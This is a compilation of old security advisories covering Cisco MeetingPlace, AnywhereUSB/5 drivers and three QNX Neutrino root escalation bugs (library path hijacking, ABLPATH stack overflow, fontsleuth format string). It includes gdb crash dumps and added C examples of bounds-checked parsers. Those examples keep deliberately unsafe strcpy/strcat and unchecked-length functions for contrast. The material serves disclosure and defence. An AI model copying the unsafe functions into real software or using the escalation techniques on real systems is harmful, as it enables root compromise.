Cisco MeetingPlace provides a web-based application for online meetings. It was discovered that a specially crafted script could be executed via certain parameters within the MeetingPlace application. The result is script code execution in the local user's context on the host. Preliminary tests concluded that the system is vulnerable with the most popular web browsers, such as fully patched Microsoft Internet Explorer 7.0 and Mozilla Firefox 2.0. User intervention (e.g. clicking on a malicious link) is necessary to trigger the exploit.

Affected Versions:
This vulnerability has been confirmed in the following versions:
- 4.3.0.246
- 4.3.0.246.5
- 5.3.104.0
- 5.3.104.3

The following versions have been tested and are unaffected because they return an XML template:
- 5.3.333.0
- 5.3.447
- 5.3.447.4
- 5.4.70.0
- 6.0.170.0

Vendor Response:
Cisco bug ID: CSCsi33940
The above vulnerability was addressed by Cisco Systems, which recommends that you upgrade to Version 5.3.333.0 or higher. Please see http://www.cisco.com/warp/public/707/cisco-sr-20070808-mp.shtml for details.

SecureTest for all your PCI requirements - PCI workshops, PCI scoping, assistance with self-assessment questionnaires, gap analysis, ASV scanning, PCI-DSS audits. SecureTest is an accredited PCI ASV & QSA company.
Contact SecureTest now to discuss your requirements in more detail on 01844 210310 or e-mail us [EMAIL PROTECTED]
SecureTest Ltd is a company registered in England and Wales with company number 4474600. Our VAT number is 793 8555 69.
AnywhereUSB/5 1.80.00 Drivers Integer Overflow
AnywhereUSB/5 1.80.00 Drivers Integer Overflow

Risk: low.

This advisory can be found here:
http://www.safend.com/advisories/digi_anywhereusb5_intoverflow.txt

I. BACKGROUND

AnywhereUSB/5 provides five USB ports, which deliver the same Plug and Play user experience as onboard USB ports. Software drivers are loaded onto a host PC or server, enabling remote devices to communicate with the host without changing existing application software. Peripheral devices can be centrally managed and monitored from a remote server or PC via an IP address.
http://www.digi.com/products/usb/anywhereusb.jsp

II. DESCRIPTION

This low-risk vulnerability in AnywhereUSB/5 1.80.00 allows an attacker to forge an AnywhereUSB server, so that a client that connects to it can be hit with a denial-of-service attack. This integer overflow in version 1.80.00 of the AnywhereUSB/5 driver package distributed for Windows NT 4.0/2000/XP and 2003 could allow attackers to Bugcheck (BSOD) currently connected clients on demand, or any new client upon connection.

The problem exists within the parsing of USB string descriptors. A malformed string descriptor whose header specifies a size of 1 byte will cause a memory copy loop to run beyond the allocated memory range. This results in a Bugcheck (BSOD) in the client computer's driver.

III. ANALYSIS

Successful exploitation allows an attacker to crash the client computer and cause a Bugcheck (BSOD) on demand. Exploitation is possible in two ways: by sending a specially crafted string descriptor to the client, or by attaching a maliciously crafted USB device to the hub.

IV. DETECTION

Safend has confirmed that AnywhereUSB/5 drivers version 1.80.00 is vulnerable. It is suspected that earlier versions of AnywhereUSB/5 may also be vulnerable.

V. WORKAROUND

Avoid plugging unknown USB devices into an AnywhereUSB/5 hub.
Apply strict firewall rules to prevent clients from connecting to a malicious AnywhereUSB/5 server, which could in turn send the malformed string descriptor to the client via TCP/IP.

VI. VENDOR RESPONSE

SecuriTeam was asked to assist the researchers with contacting Digi International.
Reported to vendor: 24th of July, 2006.
Vendor response: 25th of July, 2006.

Vendor's official response:
"The AnywhereUSB product is used with commercial USB peripheral devices on dedicated point to point IP connections, almost always on non-public local area networks. The likelihood of any such USB device producing a USB descriptor corrupted in precisely this way is extremely unlikely. This error will be corrected in a future driver release."

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2006-4459 to this issue.

VIII. CREDIT

This vulnerability was discovered by Itzik Kotler, Safend.

IX. About SecuriTeam's Assisted Disclosure

Many researchers do not have the time, energy or inclination to deal with reporting a vulnerability to vendors. SecuriTeam is here to help. If you want us to handle the logistics of contacting and following up with the vendor, making sure the problem is fixed, contact: [EMAIL PROTECTED]

Our end goal is Full Disclosure, preferably in coordination with the vendor, without exposing the researcher to unnecessary risk. We do not believe in hiding or selling vulnerabilities. Never had, never will. All credit will be properly attributed. If asked we can act as proxies, keeping your privacy and anonymity.

X. LEGAL NOTICES

Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.

---
Safend is a leading provider of innovative endpoint security solutions that protect against corporate data leakage and penetration via physical and wireless ports. For more information, visit http://www.safend.com/.
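The check that the string descriptor bug above calls for, as an added example that is not Digi's driver code: a bounds-checked USB string descriptor parser that rejects a header claiming fewer bytes than the 2-byte header itself or more bytes than were actually received, shown next to the unchecked length arithmetic under which a 1-byte bLength wraps to a huge copy count. The status codes and the sample descriptors are constructed for this illustration.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define USB_DT_STRING 0x03

/* Parser results. */
enum { USBSTR_OK = 0, USBSTR_BAD_LENGTH = -1, USBSTR_BAD_TYPE = -2,
       USBSTR_TRUNCATED = -3, USBSTR_TOO_LONG = -4 };

/* One way the wrap-around the advisory describes can arise (constructed illustration):
   (bLength - 2) / 2 code units, computed before checking that bLength >= 2. With
   bLength == 1 the subtraction wraps and the copy loop is asked for ~SIZE_MAX/2 chars. */
size_t unsafe_char_count(uint8_t blength)
{
    return (size_t)(blength - 2) / 2;
}

/* Decode a USB string descriptor held in buf[0..avail) into ASCII.
   Layout: bLength (total size, header included), bDescriptorType (0x03), then UTF-16LE
   code units. Every length is validated against both the header and the bytes actually
   received before the copy loop runs. */
int usb_parse_string_descriptor(const uint8_t *buf, size_t avail, char *out, size_t outsz)
{
    if (buf == NULL || out == NULL || outsz == 0 || avail < 2) return USBSTR_TRUNCATED;
    uint8_t blength = buf[0];
    if (blength < 2)             return USBSTR_BAD_LENGTH; /* the advisory's 1-byte header */
    if (blength > avail)         return USBSTR_TRUNCATED;  /* header overstates the packet */
    if (buf[1] != USB_DT_STRING) return USBSTR_BAD_TYPE;
    size_t nchars = (size_t)(blength - 2) / 2;            /* cannot wrap: blength >= 2 */
    if (nchars + 1 > outsz)      return USBSTR_TOO_LONG;
    for (size_t i = 0; i < nchars; i++) {
        uint16_t cu = (uint16_t)(buf[2 + 2 * i] | (buf[3 + 2 * i] << 8));
        out[i] = (cu >= 0x20 && cu < 0x7f) ? (char)cu : '?';  /* non-ASCII becomes '?' */
    }
    out[nchars] = '\0';
    return USBSTR_OK;
}

/* Constructed sample descriptors (not captured from a real device). */
static const uint8_t DESC_OK[]        = { 10, USB_DT_STRING, 'D',0, 'i',0, 'g',0, 'i',0 };
static const uint8_t DESC_LEN1[]      = { 1, USB_DT_STRING };          /* the advisory's case */
static const uint8_t DESC_SHORT_PKT[] = { 10, USB_DT_STRING, 'D',0 };   /* only 4 bytes arrived */

static char last_string[64];

/* Parse a sample into last_string and return the status code. */
int parse_sample(const uint8_t *desc, size_t len)
{
    return usb_parse_string_descriptor(desc, len, last_string, sizeof last_string);
}

int main(void)
{
    int rc = parse_sample(DESC_OK, sizeof DESC_OK);
    printf("well-formed: status %d, text \"%s\"\n", rc, last_string);
    printf("bLength=1: status %d (unchecked count would be %zu)\n",
           parse_sample(DESC_LEN1, sizeof DESC_LEN1), unsafe_char_count(1));
    printf("short packet: status %d\n", parse_sample(DESC_SHORT_PKT, sizeof DESC_SHORT_PKT));
    return 0;
}
```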
iDefense Security Advisory 02.07.06: QNX Neutrino RTOS crttrap Arbitrary Library Loading Vulnerability
QNX Neutrino RTOS crttrap Arbitrary Library Loading Vulnerability

iDefense Security Advisory 02.07.06
http://www.idefense.com/intelligence/vulnerabilities/display.php?id=379
February 7, 2006

I. BACKGROUND

QNX Software Systems Ltd.'s Neutrino RTOS (QNX) is a real-time operating system designed for use in embedded systems. More information is available at:
http://www.qnx.com/products/rtos/

II. DESCRIPTION

Local exploitation of an arbitrary library loading vulnerability in QNX Neutrino RTOS's (QNX) crttrap command allows attackers to gain root privileges.

The vulnerability specifically exists because crttrap trusts the LD_LIBRARY_PATH that a user supplies. A local attacker can create a malicious replacement for certain libraries and cause the replacement to be loaded in place of the original by manipulating the LD_LIBRARY_PATH environment variable. The crttrap binary is installed set user id root by default.

III. ANALYSIS

Successful exploitation provides local attackers with super-user privileges on the affected system, allowing for complete control. The system must be in text mode to exploit this vulnerability.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in QNX Neutrino RTOS version 6.2.1. Earlier versions are also suspected to be susceptible to exploitation.

V. WORKAROUND

Clear the set user ID or execute bits from the affected binary or remove it entirely.

VI. VENDOR RESPONSE

The vendor has not responded to communication regarding this issue.

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the name CAN-2005-1528 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems.

VIII. DISCLOSURE TIMELINE

05/12/2005 Initial vendor notification
02/07/2006 Public disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

Get paid for vulnerability research
http://www.idefense.com/poi/teams/vcp.jsp

Free tools, research and upcoming events
http://labs.idefense.com

X. LEGAL NOTICES

Copyright © 2006 iDefense, Inc.

Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.
iDefense Security Advisory 02.07.06: QNX Neutrino RTOS libAp ABLPATH Buffer Overflow Vulnerability
QNX Neutrino RTOS libAp ABLPATH Buffer Overflow Vulnerability

iDefense Security Advisory 02.07.06
http://www.idefense.com/intelligence/vulnerabilities/display.php?id=381
February 7, 2006

I. BACKGROUND

QNX Software Systems Ltd.'s Neutrino RTOS (QNX) is a real-time operating system designed for use in embedded systems. More information is available at:
http://www.qnx.com/products/rtos/

II. DESCRIPTION

Local exploitation of a stack-based buffer overflow vulnerability in QNX Inc.'s Neutrino RTOS Operating System allows local attackers to gain root privileges.

The vulnerability specifically exists due to improper handling of environment variables in the libAp system library. The libAp system library is utilized by various setuid applications, including all applications that are PhAB-generated. The _ApFindTranslationFile() function fails to check bounds on the ABLPATH environment variable prior to a strcat operation. An attacker can supply an overly long value for ABLPATH to overflow the stack buffer and overwrite the return address, as shown here:

    Program received signal SIGSEGV, Segmentation fault.
    0xb8242bf7 in ApMultiStrcat () from /usr/qnx630/target/qnx6/x86/usr/lib/libAp.so.2
    (gdb) x/i $pc
    0xb8242bf7 : mov (%eax),%dl
    (gdb) bt
    #0 0xb8242bf7 in ApMultiStrcat () from /usr/qnx630/target/qnx6/x86/usr/lib/libAp.so.2
    #1 0xb823ce07 in _ApFindTranslationFile () from /usr/qnx630/target/qnx6/x86/usr/lib/libAp.so.2
    #2 0x42424242 in ?? ()

Attackers can supply a specially crafted value to overflow the buffer and execute arbitrary code.

III. ANALYSIS

Successful exploitation of the vulnerability allows local attackers to gain root privileges. The libAp library is a core system library on Neutrino RTOS; however, it has had a number of trivial vulnerabilities similar to this one. A related vulnerability is the ABLANG environment variable overflow, which results in a similarly exploitable scenario.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability on QNX Neutrino RTOS 6.3.0. All versions are suspected vulnerable.

V. WORKAROUND

As a workaround solution, remove the setuid bit from any programs linked to libAp.so.2. An example is shown here:

    # ls -l /usr/photon/bin/phlocale
    -rwsrwxr-x 1 root root 54244 May 05 2004 /usr/photon/bin/phlocale
    # ldd /usr/photon/bin/phlocale
    /usr/photon/bin/phlocale:
        libAp.so.3 => /usr/lib/libAp.so.3 (0xb820)
        libph.so.3 => /usr/lib/libph.so.3 (0xb821)
        libphrender.so.2 => /usr/lib/libphrender.so.2 (0xb8312000)
        libm.so.2 => /lib/libm.so.2 (0xb8347000)
        libfont.so.1 => /lib/libfont.so.1 (0xb8363000)
        libc.so.2 => /usr/lib/ldqnx.so.2 (0xb030)
    # chmod -s /usr/photon/bin/phlocale

VI. VENDOR RESPONSE

The vendor has not responded to communication regarding this issue.

VII. CVE INFORMATION

A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not been assigned yet.

VIII. DISCLOSURE TIMELINE

12/15/2005 Initial vendor notification
02/07/2006 Public disclosure

IX. CREDIT

iDefense credits Filipe Balestra ([EMAIL PROTECTED]) with the discovery of this vulnerability.
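A bounded replacement for the unchecked strcat on ABLPATH described above, as an added example that is not the libAp code: the colon-separated ABLPATH list is walked entry by entry, each candidate path is built with snprintf, and any candidate that would not fit the fixed buffer is refused rather than written. PATH_LEN, the directory names and the translation file name are constructed assumptions for this illustration.

```c
#include <stdio.h>
#include <string.h>

#define PATH_LEN 256   /* constructed size for the fixed path buffer */

/* Shape of the defect in the advisory: environment-derived strings of any length are
   concatenated into a fixed buffer with no bound. Kept only for contrast; never call it. */
void build_path_unbounded(const char *dir, const char *file, char out[PATH_LEN])
{
    strcpy(out, dir); strcat(out, "/"); strcat(out, file);
}

/* Bounded replacement. ABLPATH is a colon-separated directory list; the idx-th candidate
   "<dir>/<file>" is written with snprintf and refused if it would not fit, so no
   environment value can push the write past 'out'. Returns 0 on success, 1 when there is
   no idx-th non-empty entry, -1 on overflow or a 'file' containing a path separator. */
int translation_candidate(const char *ablpath, const char *file, size_t idx,
                          char *out, size_t outsz)
{
    if (ablpath == NULL || file == NULL || strchr(file, '/') != NULL || outsz == 0)
        return -1;
    const char *p = ablpath;
    size_t seen = 0;
    for (;;) {
        const char *sep = strchr(p, ':');
        size_t dirlen = sep ? (size_t)(sep - p) : strlen(p);
        if (dirlen > 0) {
            if (seen == idx) {
                int n = snprintf(out, outsz, "%.*s/%s", (int)dirlen, p, file);
                return (n < 0 || (size_t)n >= outsz) ? -1 : 0;   /* -1: would have overflowed */
            }
            seen++;
        }
        if (sep == NULL) return 1;
        p = sep + 1;
    }
}

/* Constructed sample values (not taken from a real QNX installation). */
static const char SAMPLE_ABLPATH[] = "/usr/photon/translations:/home/user/abl";
static char long_ablpath[4 * PATH_LEN];
static char demo_out[PATH_LEN];

/* An ABLPATH far longer than the path buffer, as an attacker-controlled value would be. */
const char *oversized_ablpath(void)
{
    memset(long_ablpath, 'A', sizeof long_ablpath - 1);
    long_ablpath[sizeof long_ablpath - 1] = '\0';
    return long_ablpath;
}

/* Wrapper for the demo and tests: fills demo_out and returns the status code. */
int demo_candidate(const char *ablpath, size_t idx)
{
    return translation_candidate(ablpath, "app.abl", idx, demo_out, sizeof demo_out);
}

int main(void)
{
    for (size_t i = 0; demo_candidate(SAMPLE_ABLPATH, i) == 0; i++)
        printf("candidate %zu: %s\n", i, demo_out);
    printf("oversized ABLPATH -> status %d (refused instead of overflowing)\n",
           demo_candidate(oversized_ablpath(), 0));
    return 0;
}
```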
iDefense Security Advisory 02.07.06: QNX Neutrino RTOS fontsleuth Command Format String Vulnerability
QNX Neutrino RTOS fontsleuth Command Format String Vulnerability

iDefense Security Advisory 02.07.06
http://www.idefense.com/intelligence/vulnerabilities/display.php?id=380
February 7, 2006

I. BACKGROUND

QNX Software Systems Ltd.'s Neutrino RTOS (QNX) is a real-time operating system designed for use in embedded systems. More information is available at:
http://www.qnx.com/products/rtos/

fontsleuth is a setuid root binary included by default in version 6.3.0 of QNX Neutrino RTOS (QNX). It is a utility that tells the Photon font manager where to look for fonts.

II. DESCRIPTION

Local exploitation of a format string vulnerability in QNX Neutrino RTOS's (QNX) fontsleuth command allows attackers to gain root privileges.

The problem specifically exists in the handling of a string passed as the zeroth argument to the set user id (setuid) binary fontsleuth. The string is ultimately passed to a formatted print function as the format string itself, rather than through a fixed format specifier. This allows the attacker to use such dangerous format specifiers as %n and %hn to write to arbitrary areas in memory. Using this method, it is possible to overwrite the stored return address or several function pointers, allowing an attacker to seize CPU control and eventually execute arbitrary code under root privileges.

The following debugger dump shows what successful exploitation of this vulnerability looks like at a low level.

    Loaded symbols for /usr/qnx630/target/qnx6/x86/lib/libc.so.2
    #0 0xb033ec7e in _Putfld () from /usr/qnx630/target/qnx6/x86/lib/libc.so.2
    (gdb) x/i $pc
    0xb033ec7e <_Putfld+1082>: mov %ax,(%edx)
    (gdb) i r eax edx
    eax 0x4142 16706
    edx 0x51525354 1364349780

Both EAX and EDX are controlled by the attacker, allowing an overwrite of any location in memory. Furthermore, multiple writes can be achieved by using more than one write format specifier. An attacker can choose to overwrite the saved return address or a function pointer and easily gain control of execution.

III. ANALYSIS

Successful exploitation provides local attackers with super-user privileges on the affected system. This allows the attacker to have complete control.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in QNX Neutrino RTOS version 6.3.0. Earlier versions are suspected to be susceptible to exploitation as well.

V. WORKAROUND

Clear the set user ID or execute bits from the affected binary or remove it entirely.

VI. VENDOR RESPONSE

The vendor has not responded to communication regarding this issue.

VII. CVE INFORMATION

A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not been assigned yet.

VIII. DISCLOSURE TIMELINE

12/23/2004 Initial vendor notification
02/07/2006 Public disclosure

IX. CREDIT

iDefense Labs is credited with this discovery.